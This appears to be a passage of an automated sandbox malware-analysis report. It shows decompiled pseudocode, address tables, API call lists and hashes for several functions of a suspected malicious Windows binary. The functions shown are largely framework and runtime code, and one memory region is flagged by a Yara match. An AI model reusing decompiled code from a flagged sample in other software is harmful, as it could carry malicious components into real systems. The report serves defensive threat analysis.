				 *((intOrPtr*)(_t147 - 0xb8)) = __ecx;
				E0042A1E2(__ecx,  *((intOrPtr*)(_t147 + 0x1c)));
				 *((intOrPtr*)(_t147 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x4547f4;
				E004014C0(__ecx + 0x8c, __edx);
				 *((intOrPtr*)(_t146 + 0x1d8)) = 0;
				 *((char*)(_t147 - 4)) = 1;
				 *((intOrPtr*)(_t146 + 0x1dc)) = 0;
				if( *((intOrPtr*)(_t147 + 0x20)) == 0) {
					_t143 = 0x94;
					E00431160(0x94, _t147 - 0xa4, 0, 0x94);
					_t148 = _t148 + 0xc;
					 *(_t147 - 0xa4) = 0x94;
					_t119 = GetVersionExA(_t147 - 0xa4);
					 *((intOrPtr*)(_t147 + 0x20)) = 0x58;
					asm("sbb eax, eax");
					 *(_t146 + 0x78) =  !_t119 &  *(_t147 + 0x24);
				}
				_t87 = E0043108C(0, _t136, _t143,  *((intOrPtr*)(_t147 + 0x20)));
				_pop(_t126);
				 *((intOrPtr*)(_t146 + 0x74)) = _t87;
				_t155 = _t87;
				if(_t87 == 0) {
					_t87 = E004063FE(0, _t126, _t143, _t146, _t155);
				}
				E00431160(_t143, _t87, 0,  *((intOrPtr*)(_t147 + 0x20)));
				_t89 =  *(_t147 + 8);
				 *(_t146 + 0x88) = _t89;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t146 + 0x54)) =  ~_t89 + 0x7005;
				 *((intOrPtr*)(_t146 + 0x1d4)) = 0;
				_t127 = _t146 + 0x90;
				 *_t127 = 0;
				_t144 = _t146 + 0xd0;
				 *_t144 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)))) =  *((intOrPtr*)(_t147 + 0x20));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x1c)) = _t144;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x20)) = 0x104;
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x3c)) =  *((intOrPtr*)(_t147 + 0xc));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 0x24)) = _t127;
				_t128 = 0x40;
				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x28) = _t128;
				 *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) =  *( *((intOrPtr*)(_t146 + 0x74)) + 0x34) |  *(_t147 + 0x14) | 0x00080020;
				if(( *(_t147 + 0x14) & _t128) != 0) {
					_t115 =  *((intOrPtr*)(_t146 + 0x74));
					_t50 = _t115 + 0x34;
					 *_t50 =  *(_t115 + 0x34) & 0xff7fffff;
					_t157 =  *_t50;
				}
				_t99 = E0041F363(0, _t144, _t146, _t157);
				_t129 =  *((intOrPtr*)(_t146 + 0x74));
				 *((intOrPtr*)( *((intOrPtr*)(_t146 + 0x74)) + 8)) =  *((intOrPtr*)(_t99 + 0xc));
				_t101 =  *((intOrPtr*)(_t146 + 0x74));
				 *((intOrPtr*)(_t101 + 0x44)) = E0042A570;
				if( *((intOrPtr*)(_t147 - 0xb0)) != 0) {
					_t101 = E004048ED(0, _t129, _t144, _t146, _t144, 0x104,  *((intOrPtr*)(_t147 - 0xb0)), 0xffffffff);
				}
				if( *((intOrPtr*)(_t147 - 0xac)) != 0) {
					_t144 = _t146 + 0x8c;
					E00402CA0(_t146 + 0x8c, _t146,  *((intOrPtr*)(_t147 - 0xac)));
					_t113 = E004014F0(_t146 + 0x8c, 0);
					while(1) {
						_t114 = E004334ED(_t113, 0x7c);
						if(_t114 == 0) {
							break;
						}
						 *_t114 = 0;
						_t113 = _t114 + 1;
						__eflags = _t114 + 1;
					}
					_t101 =  *((intOrPtr*)(_t146 + 0x74));
					 *((intOrPtr*)(_t101 + 0xc)) =  *((intOrPtr*)(_t146 + 0x8c));
				}
				if( *(_t146 + 0x78) == 1) {
					__imp__CoInitializeEx(0, 2);
					if(_t101 < 0) {
						L23:
						 *(_t146 + 0x78) = 0;
					} else {
						_t104 = _t147 - 0xa8;
						_push(_t104);
						_push(0x454974);
						_t144 = _t146 + 0x1d8;
						_push(1);
						 *_t144 = 0x4547a0;
						 *((intOrPtr*)(_t146 + 0x1dc)) = 0x4547d0;
						_push(0);
						if( *(_t146 + 0x88) == 0) {
							_push(0x463168);
						} else {
							_push(0x463158);
						}
						__imp__CoCreateInstance();
						if(_t104 < 0) {
							goto L23;
						} else {
							_t105 =  *((intOrPtr*)(_t147 - 0xa8));
							_t130 =  *_t105;
							_t106 =  *((intOrPtr*)( *_t105))(_t105, 0x454764, _t147 - 0xb4);
							_t165 = _t106;
							if(_t106 < 0) {
								L20:
								E00406436(0, _t130, _t144, _t146, _t165);
							}
							_t107 =  *((intOrPtr*)(_t147 - 0xa8));
							_t130 =  *_t107;
							_push(_t146 + 0x7c);
							_push(_t144);
							_push(_t107);
							if( *((intOrPtr*)( *_t107 + 0x1c))() < 0) {
								goto L20;
							}
							 *((intOrPtr*)(_t146 + 0x80)) =  *((intOrPtr*)(_t147 - 0xa8));
							 *((intOrPtr*)(_t146 + 0x84)) =  *((intOrPtr*)(_t147 - 0xb4));
						}
					}
				}
				return E00431B87(0, _t144, _t146);
			}





















                  0x0042b11b
                  0x0042b11b
                  0x0042b11b
                  0x0042b125
                  0x0042b12d
                  0x0042b136
                  0x0042b13f
                  0x0042b142
                  0x0042b148
                  0x0042b155
                  0x0042b158
                  0x0042b15e
                  0x0042b163
                  0x0042b169
                  0x0042b16d
                  0x0042b176
                  0x0042b178
                  0x0042b186
                  0x0042b18b
                  0x0042b195
                  0x0042b19b
                  0x0042b1a8
                  0x0042b1af
                  0x0042b1b6
                  0x0042b1b6
                  0x0042b1bc
                  0x0042b1c1
                  0x0042b1c2
                  0x0042b1c5
                  0x0042b1c7
                  0x0042b1c9
                  0x0042b1c9
                  0x0042b1d3
                  0x0042b1d8
                  0x0042b1de
                  0x0042b1e9
                  0x0042b1f0
                  0x0042b1f6
                  0x0042b1fc
                  0x0042b202
                  0x0042b204
                  0x0042b20a
                  0x0042b20c
                  0x0042b214
                  0x0042b21a
                  0x0042b224
                  0x0042b22d
                  0x0042b235
                  0x0042b236
                  0x0042b242
                  0x0042b248
                  0x0042b24a
                  0x0042b24d
                  0x0042b24d
                  0x0042b24d
                  0x0042b24d
                  0x0042b254
                  0x0042b25c
                  0x0042b25f
                  0x0042b262
                  0x0042b265
                  0x0042b272
                  0x0042b282
                  0x0042b287
                  0x0042b290
                  0x0042b298
                  0x0042b2a0
                  0x0042b2a8
                  0x0042b2b2
                  0x0042b2b5
                  0x0042b2be
                  0x00000000
                  0x00000000
                  0x0042b2af
                  0x0042b2b1
                  0x0042b2b1
                  0x0042b2b1
                  0x0042b2c0
                  0x0042b2c9
                  0x0042b2c9
                  0x0042b2d0
                  0x0042b2d9
                  0x0042b2e1
                  0x0042b379
                  0x0042b379
                  0x0042b2e7
                  0x0042b2e7
                  0x0042b2ed
                  0x0042b2ee
                  0x0042b2f3
                  0x0042b2f9
                  0x0042b2fb
                  0x0042b301
                  0x0042b30b
                  0x0042b312
                  0x0042b31b
                  0x0042b314
                  0x0042b314
                  0x0042b314
                  0x0042b320
                  0x0042b328
                  0x00000000
                  0x0042b32a
                  0x0042b32a
                  0x0042b330
                  0x0042b33f
                  0x0042b341
                  0x0042b343
                  0x0042b345
                  0x0042b345
                  0x0042b345
                  0x0042b34a
                  0x0042b350
                  0x0042b355
                  0x0042b356
                  0x0042b357
                  0x0042b35d
                  0x00000000
                  0x00000000
                  0x0042b365
                  0x0042b371
                  0x0042b371
                  0x0042b328
                  0x0042b2e1
                  0x0042b383

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042B125
                  • _memset.LIBCMT ref: 0042B186
                  • GetVersionExA.KERNEL32(?), ref: 0042B19B
                  • _malloc.LIBCMT ref: 0042B1BC
                  • _memset.LIBCMT ref: 0042B1D3
                  • CoInitializeEx.OLE32(00000000,00000002), ref: 0042B2D9
                  • CoCreateInstance.OLE32(00463168,00000000), ref: 0042B320
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: _memset$CreateException@8H_prolog3H_prolog3_InitializeInstanceThrowVersion_malloc
                  • String ID: X
                  • API String ID: 4031887728-3081909835
                  • Opcode ID: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction ID: 5172e0a2d860184040d2a6c4a60c16d353be7440ddfd1ca1bccc4f22e79cac10
                  • Opcode Fuzzy Hash: ee236fb7defe8795996fa497833549cdea1f237598b8f663734decd1af400ac8
                  • Instruction Fuzzy Hash: 9A7168B4600755DFDB20DF25C880B9ABBE0FF49308F4045AEE9999B361D738A984CF55
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00421E22, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 164COMMON
                  Download Yara Rule
                  C-Code - Quality: 86%
                  			E00421E22(void* __ebx, intOrPtr* __ecx, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				struct tagPOINT _v28;
				intOrPtr _v40;
				signed int _v72;
				char _v76;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t60;
				signed int _t62;
				signed int _t63;
				signed int _t67;
				signed int _t70;
				intOrPtr _t72;
				signed int _t79;
				short _t80;
				short _t87;
				short _t92;
				intOrPtr _t111;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr* _t118;

				_t115 = _a4;
				_t118 = __ecx;
				if(E0040CD15(__ecx, __eflags, _t115) == 0) {
					_t116 =  *((intOrPtr*)(_t115 + 4));
					_push(__ebx);
					_t100 = __ecx;
					_t60 = E00410293(__ecx);
					__eflags =  *(__ecx + 0x84) & 0x00000020;
					_v20 = _t60;
					if(( *(__ecx + 0x84) & 0x00000020) != 0) {
						L5:
						__eflags = _t116 - 0x200;
						if(_t116 < 0x200) {
							L7:
							__eflags = _t116 - 0xa0 - 9;
							if(__eflags > 0) {
								L30:
								_t62 = E0040F8D7(_t118);
								__eflags = _t62;
								if(_t62 == 0) {
									L32:
									__eflags = _v20;
									if(_v20 == 0) {
										L35:
										_t63 = IsWindow( *(_t118 + 0x20));
										__eflags = _t63;
										if(_t63 == 0) {
											L37:
											__eflags = 0;
											return 0;
										}
										return E0040D369(_a4);
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t117 = _v20;
										_t67 =  *((intOrPtr*)( *_v20 + 0x108))(_a4);
										__eflags = _t67;
										if(_t67 != 0) {
											goto L1;
										}
										_t70 = E0040F898(_t117);
										_v20 = _t70;
										__eflags = _t70;
										if(_t70 != 0) {
											continue;
										}
										goto L35;
									}
									goto L1;
								}
								__eflags =  *(_t62 + 0x68);
								if( *(_t62 + 0x68) != 0) {
									goto L37;
								}
								goto L32;
							}
							L8:
							_v16 = E0041F396(0x201, _t100, _t116, _t118, __eflags);
							_t72 = _a4;
							_v28.y =  *((intOrPtr*)(_t72 + 0x18));
							_v28.x =  *(_t72 + 0x14);
							ScreenToClient( *(_t118 + 0x20),  &_v28);
							E00431160(_t116,  &_v76, 0, 0x2c);
							_v76 = 0x30;
							_t79 =  *((intOrPtr*)( *_t118 + 0x74))(_v28.x, _v28.y,  &_v76);
							__eflags = _v40 - 0xffffffff;
							_v8 = _t79;
							if(__eflags != 0) {
								_push(_v40);
								E004316F6(0x201, _t116, _t118, __eflags);
							}
							__eflags = _t116 - 0x201;
							if(_t116 != 0x201) {
								L13:
								_v12 = _v12 & 0x00000000;
								__eflags = _t116 - 0x201;
								if(_t116 != 0x201) {
									_t92 = GetKeyState(1);
									__eflags = _t92;
									if(_t92 < 0) {
										_v8 =  *((intOrPtr*)(_v16 + 0x4c));
									}
								}
								L16:
								__eflags = _v8;
								if(_v8 < 0) {
									L26:
									_t80 = GetKeyState(1);
									__eflags = _t80;
									if(_t80 >= 0) {
										L28:
										 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
										KillTimer( *(_t118 + 0x20), 0xe001);
										L29:
										 *((intOrPtr*)(_v16 + 0x4c)) = _v8;
										goto L30;
									}
									__eflags = _v12;
									if(_v12 == 0) {
										goto L29;
									}
									goto L28;
								}
								__eflags = _v12;
								if(_v12 != 0) {
									goto L26;
								}
								__eflags = _t116 - 0x202;
								if(_t116 != 0x202) {
									__eflags =  *(_t118 + 0x80) & 0x00000008;
									if(( *(_t118 + 0x80) & 0x00000008) != 0) {
										L25:
										 *((intOrPtr*)( *_t118 + 0x178))(_v8);
										goto L29;
									}
									_t87 = GetKeyState(1);
									__eflags = _t87;
									if(_t87 < 0) {
										goto L25;
									}
									_t111 = _v16;
									__eflags = _v8 -  *((intOrPtr*)(_t111 + 0x4c));
									if(_v8 ==  *((intOrPtr*)(_t111 + 0x4c))) {
										goto L29;
									}
									_push(0x12c);
									_push(0xe000);
									L20:
									E0042124D(_t118);
									goto L29;
								}
								 *((intOrPtr*)( *_t118 + 0x178))(0xffffffff);
								_push(0xc8);
								_push(0xe001);
								goto L20;
							}
							__eflags = _v72 & 0x80000000;
							if((_v72 & 0x80000000) == 0) {
								goto L13;
							}
							_v12 = 1;
							goto L16;
						}
						__eflags = _t116 - 0x209;
						if(__eflags <= 0) {
							goto L8;
						}
						goto L7;
					}
					__eflags = _t116 - 0x201;
					if(_t116 == 0x201) {
						goto L5;
					}
					__eflags = _t116 - 0x202;
					if(_t116 != 0x202) {
						goto L30;
					}
					goto L5;
				}
				L1:
				return 1;
			}




























                  0x00421e2c
                  0x00421e30
                  0x00421e39
                  0x00421e43
                  0x00421e46
                  0x00421e47
                  0x00421e49
                  0x00421e4e
                  0x00421e55
                  0x00421e5d
                  0x00421e6f
                  0x00421e6f
                  0x00421e75
                  0x00421e7f
                  0x00421e85
                  0x00421e88
                  0x00421fc5
                  0x00421fc7
                  0x00421fcd
                  0x00421fcf
                  0x00421fd7
                  0x00421fd7
                  0x00421fdb
                  0x00422003
                  0x00422006
                  0x0042200c
                  0x0042200e
                  0x0042201c
                  0x0042201c
                  0x00000000
                  0x0042201c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421fdd
                  0x00421fdd
                  0x00421fdd
                  0x00421fe7
                  0x00421fed
                  0x00421fef
                  0x00000000
                  0x00000000
                  0x00421ff7
                  0x00421ffc
                  0x00421fff
                  0x00422001
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00422001
                  0x00000000
                  0x00421fdd
                  0x00421fd1
                  0x00421fd5
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421fd5
                  0x00421e8e
                  0x00421e93
                  0x00421e96
                  0x00421e9f
                  0x00421ea9
                  0x00421eac
                  0x00421eba
                  0x00421ed0
                  0x00421ed7
                  0x00421eda
                  0x00421ede
                  0x00421ee1
                  0x00421ee3
                  0x00421ee6
                  0x00421eeb
                  0x00421eec
                  0x00421eee
                  0x00421f02
                  0x00421f02
                  0x00421f06
                  0x00421f08
                  0x00421f0c
                  0x00421f12
                  0x00421f15
                  0x00421f1d
                  0x00421f1d
                  0x00421f15
                  0x00421f20
                  0x00421f20
                  0x00421f24
                  0x00421f8f
                  0x00421f91
                  0x00421f97
                  0x00421f9a
                  0x00421fa2
                  0x00421fa8
                  0x00421fb6
                  0x00421fbc
                  0x00421fc2
                  0x00000000
                  0x00421fc2
                  0x00421f9c
                  0x00421fa0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421fa0
                  0x00421f26
                  0x00421f2a
                  0x00000000
                  0x00000000
                  0x00421f2c
                  0x00421f32
                  0x00421f53
                  0x00421f5a
                  0x00421f80
                  0x00421f87
                  0x00000000
                  0x00421f87
                  0x00421f5e
                  0x00421f64
                  0x00421f67
                  0x00000000
                  0x00000000
                  0x00421f6c
                  0x00421f6f
                  0x00421f72
                  0x00000000
                  0x00000000
                  0x00421f74
                  0x00421f79
                  0x00421f4a
                  0x00421f4c
                  0x00000000
                  0x00421f4c
                  0x00421f3a
                  0x00421f40
                  0x00421f45
                  0x00000000
                  0x00421f45
                  0x00421ef0
                  0x00421ef7
                  0x00000000
                  0x00000000
                  0x00421ef9
                  0x00000000
                  0x00421ef9
                  0x00421e77
                  0x00421e7d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421e7d
                  0x00421e5f
                  0x00421e61
                  0x00000000
                  0x00000000
                  0x00421e63
                  0x00421e69
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421e69
                  0x00421e3b
                  0x00000000

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientScreenWindow_memset
                  • String ID: 0
                  • API String ID: 1268500159-4108050209
                  • Opcode ID: 81379cf26b52d18687ae8a87a0efbcf3c5d5b7e6def768ce166db48b00316175
                  • Instruction ID: 4c652db0de8b7d6beb0a25977988bbef7d9d9a37af492f7cdf9cd22247f081bd
                  • Opcode Fuzzy Hash: 81379cf26b52d18687ae8a87a0efbcf3c5d5b7e6def768ce166db48b00316175
                  • Instruction Fuzzy Hash: 0851D631B00214EFDF20DFA4D948BAE7BB1BF14304F51016AE925A72E1DB799E81CB49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429112, Relevance: 12.1, APIs: 8, Instructions: 125filestringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 98%
                  			E00429112(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				CHAR* _t45;
				long _t46;
				CHAR* _t50;
				long _t55;
				void* _t57;
				int _t63;
				long _t73;
				void* _t86;
				void* _t89;
				CHAR* _t91;
				void* _t94;
				CHAR* _t99;
				CHAR* _t101;

				_t92 = __esi;
				_t89 = __edx;
				_push(0x158);
				E00431B04(E0044C60B, __ebx, __edi, __esi);
				_t91 =  *(_t94 + 8);
				_t45 =  *(_t94 + 0xc);
				_t73 =  *(_t94 + 0x10);
				_t99 = _t91;
				_t75 = 0 | _t99 != 0x00000000;
				 *(_t94 - 0x158) = _t45;
				_t100 = _t99 != 0;
				if(_t99 != 0) {
					L2:
					_t101 = _t45;
					_t75 = 0 | _t101 != 0x00000000;
					if(_t101 != 0) {
						goto L1;
					}
					_t77 = _t94 - 0x15c;
					_t46 = GetFullPathNameA(_t45, 0x104, _t91, _t94 - 0x15c);
					if(_t46 != 0) {
						__eflags = _t46 - 0x104;
						if(_t46 < 0x104) {
							E004014C0(_t94 - 0x154, _t89);
							 *(_t94 - 4) =  *(_t94 - 4) & 0x00000000;
							E00428F81(_t73, __eflags, _t91, _t94 - 0x154);
							_t50 = PathIsUNCA( *(_t94 - 0x154));
							__eflags = _t50;
							if(_t50 != 0) {
								L21:
								E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
								__eflags = 1;
								goto L22;
							}
							_t55 = GetVolumeInformationA( *(_t94 - 0x154), _t50, _t50, _t50, _t94 - 0x164, _t94 - 0x160, _t50, _t50);
							__eflags = _t55;
							if(_t55 != 0) {
								__eflags =  *(_t94 - 0x160) & 0x00000002;
								if(( *(_t94 - 0x160) & 0x00000002) == 0) {
									CharUpperA(_t91);
								}
								__eflags =  *(_t94 - 0x160) & 0x00000004;
								if(( *(_t94 - 0x160) & 0x00000004) == 0) {
									_t57 = FindFirstFileA( *(_t94 - 0x158), _t94 - 0x150);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										goto L21;
									}
									FindClose(_t57);
									__eflags =  *(_t94 - 0x15c);
									if( *(_t94 - 0x15c) == 0) {
										goto L11;
									}
									__eflags =  *(_t94 - 0x15c) - _t91;
									if( *(_t94 - 0x15c) <= _t91) {
										goto L11;
									}
									_t63 = lstrlenA(_t94 - 0x124);
									_t86 =  *(_t94 - 0x15c) - _t91;
									__eflags = _t63 + _t86 - 0x104;
									if(_t63 + _t86 >= 0x104) {
										__eflags = _t73;
										if(_t73 != 0) {
											 *((intOrPtr*)(_t73 + 8)) = 3;
											E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
										}
										L12:
										E004010B0( &(( *(_t94 - 0x154))[0xfffffffffffffff0]), _t89);
										goto L5;
									}
									__eflags = 0x104;
									E00414FEE(_t73, _t89, _t91, 0x104,  *(_t94 - 0x15c), 0x104, _t94 - 0x124);
								}
								goto L21;
							}
							L11:
							E004290E3(_t73,  *(_t94 - 0x158));
							goto L12;
						}
						__eflags = _t73;
						if(_t73 != 0) {
							 *((intOrPtr*)(_t73 + 8)) = 3;
							E00402CA0(_t73 + 0x10, 0x104,  *(_t94 - 0x158));
						}
						goto L5;
					} else {
						E004048ED(_t73, _t77, _t91, 0x104, _t91, 0x104,  *(_t94 - 0x158), 0xffffffff);
						E004290E3(_t73,  *(_t94 - 0x158));
						L5:
						L22:
						return E00431B87(_t73, _t91, 0x104);
					}
				}
				L1:
				_t45 = E00406436(_t73, _t75, _t91, _t92, _t100);
				goto L2;
			}
















                  0x00429112
                  0x00429112
                  0x00429112
                  0x0042911c
                  0x00429121
                  0x00429124
                  0x00429127
                  0x0042912c
                  0x0042912e
                  0x00429131
                  0x00429137
                  0x00429139
                  0x00429140
                  0x00429142
                  0x00429144
                  0x00429149
                  0x00000000
                  0x00000000
                  0x0042914b
                  0x0042915a
                  0x00429162
                  0x00429189
                  0x0042918b
                  0x004291ae
                  0x004291b3
                  0x004291bf
                  0x004291ca
                  0x004291d0
                  0x004291d2
                  0x00429296
                  0x0042929f
                  0x004292a6
                  0x00000000
                  0x004292a6
                  0x004291f1
                  0x004291f7
                  0x004291f9
                  0x0042921a
                  0x00429221
                  0x00429224
                  0x00429224
                  0x0042922a
                  0x00429231
                  0x00429240
                  0x00429246
                  0x00429249
                  0x00000000
                  0x00000000
                  0x0042924c
                  0x00429252
                  0x00429259
                  0x00000000
                  0x00000000
                  0x0042925b
                  0x00429261
                  0x00000000
                  0x00000000
                  0x0042926a
                  0x00429276
                  0x0042927a
                  0x0042927c
                  0x004292af
                  0x004292b1
                  0x004292c0
                  0x004292c7
                  0x004292c7
                  0x00429207
                  0x00429210
                  0x00000000
                  0x00429210
                  0x00429285
                  0x0042928e
                  0x00429293
                  0x00000000
                  0x00429231
                  0x004291fb
                  0x00429202
                  0x00000000
                  0x00429202
                  0x0042918d
                  0x0042918f
                  0x0042919a
                  0x004291a1
                  0x004291a1
                  0x00000000
                  0x00429164
                  0x0042916e
                  0x0042917d
                  0x00429182
                  0x004292a7
                  0x004292ac
                  0x004292ac
                  0x00429162
                  0x0042913b
                  0x0042913b
                  0x00000000

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 0042911C
                  • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,004292E3,?,?,00000000,?,0041D5EC,?,?), ref: 0042915A
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • PathIsUNCA.SHLWAPI(?,?,?,?,0041D5EC,?,?), ref: 004291CA
                  • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,0041D5EC,?,?), ref: 004291F1
                  • CharUpperA.USER32(?), ref: 00429224
                  • FindFirstFileA.KERNEL32(?,?), ref: 00429240
                  • FindClose.KERNEL32(00000000), ref: 0042924C
                  • lstrlenA.KERNEL32(?), ref: 0042926A
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: FindPath$CharCloseException@8FileFirstFullH_prolog3H_prolog3_InformationNameThrowUpperVolumelstrlen
                  • String ID:
                  • API String ID: 624941980-0
                  • Opcode ID: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction ID: 4c08258b8b62b4c28abc3044bc15ce8abfe974271ea14c90092fafafccbe739e
                  • Opcode Fuzzy Hash: b8858de18712f8b80784316cab7b21761622b608ed6791508cb3c03fc169abe2
                  • Instruction Fuzzy Hash: 1141C571A00225EBEF259F62DC48BFE7778BF45315F4005EEB405A5291DB384E90CE18
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 02312F82, Relevance: 10.9, APIs: 7, Instructions: 416COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.646512151.0000000002311000.00000020.00000001.sdmp, Offset: 02311000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2311000_YF4dF4w2Cr.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memcpy
                  • String ID:
                  • API String ID: 3131771470-0
                  • Opcode ID: 3def0143aba1b9c4904ee5e37ded57465d8e4f2471d1c15f6b51b8ae0e23b0d7
                  • Instruction ID: 4e95d0bce67c737067a9085a88c8ddc64bca97240b0523968c58713a5cf4176d
                  • Opcode Fuzzy Hash: 3def0143aba1b9c4904ee5e37ded57465d8e4f2471d1c15f6b51b8ae0e23b0d7
                  • Instruction Fuzzy Hash: 2C024730A0066AEFCB2ECF68C9856EAFB75FF44304F1401B9C85697B42D732A565CB94
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00430650, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 85%
                  			E00430650(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x463404; // 0x38a11573
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x466af0 = _t6;
				 *0x466aec = _t22;
				 *0x466ae8 = _t25;
				 *0x466ae4 = _t21;
				 *0x466ae0 = _t27;
				 *0x466adc = _t26;
				 *0x466b08 = ss;
				 *0x466afc = cs;
				 *0x466ad8 = ds;
				 *0x466ad4 = es;
				 *0x466ad0 = fs;
				 *0x466acc = gs;
				asm("pushfd");
				_pop( *0x466b00);
				 *0x466af4 =  *_t31;
				 *0x466af8 = _v0;
				 *0x466b04 =  &_a4;
				 *0x466a40 = 0x10001;
				_t11 =  *0x466af8; // 0x0
				 *0x4669f4 = _t11;
				 *0x4669e8 = 0xc0000409;
				 *0x4669ec = 1;
				_t12 =  *0x463404; // 0x38a11573
				_v812 = _t12;
				_t13 =  *0x463408; // 0xc75eea8c
				_v808 = _t13;
				 *0x466a38 = IsDebuggerPresent();
				_push(1);
				E0043F5DB(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter("�iF");
				if( *0x466a38 == 0) {
					_push(1);
					E0043F5DB(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



















                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430650
                  0x00430656
                  0x00430658
                  0x00430658
                  0x004365b7
                  0x004365bc
                  0x004365c2
                  0x004365c8
                  0x004365ce
                  0x004365d4
                  0x004365da
                  0x004365e1
                  0x004365e8
                  0x004365ef
                  0x004365f6
                  0x004365fd
                  0x00436604
                  0x00436605
                  0x0043660e
                  0x00436616
                  0x0043661e
                  0x00436629
                  0x00436633
                  0x00436638
                  0x0043663d
                  0x00436647
                  0x00436651
                  0x00436656
                  0x0043665c
                  0x00436661
                  0x0043666d
                  0x00436672
                  0x00436674
                  0x0043667c
                  0x00436687
                  0x00436694
                  0x00436696
                  0x00436698
                  0x0043669d
                  0x004366b1

                  APIs
                  • IsDebuggerPresent.KERNEL32 ref: 00436667
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043667C
